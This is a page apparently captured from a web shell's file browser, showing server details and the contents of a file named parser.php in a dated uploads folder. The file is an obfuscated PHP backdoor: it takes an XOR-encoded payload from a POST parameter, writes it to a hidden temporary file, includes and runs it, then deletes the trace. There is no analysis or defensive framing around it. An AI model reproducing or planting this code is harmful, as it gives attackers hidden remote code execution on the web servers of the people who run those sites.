HEX
Server: Apache/2.4.59 (Debian)
System: Linux keymana 4.19.0-21-cloud-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
User: lijunjie (1003)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: //proc/thread-self/root/proc/self/root/proc/self/root/proc/19805/cwd/2025/09/parser.php
<?php

if(isset($_POST["\x73\x79m"])){
	$marker = hex2bin($_POST["\x73\x79m"]);
	$itm = ''; $l = 0; while($l < strlen($marker)){$itm .= chr(ord($marker[$l]) ^ 25);$l++;}
	$entry = array_filter([ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), "/dev/shm", session_save_path(), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp"]);
	foreach ($entry as $key => $factor) {
    		if (!!is_dir($factor) && !!is_writable($factor)) {
    $record = vsprintf("%s/%s", [$factor, ".ent"]);
    if (file_put_contents($record, $itm)) {
	include $record;
	@unlink($record);
	exit;
}
}
}
}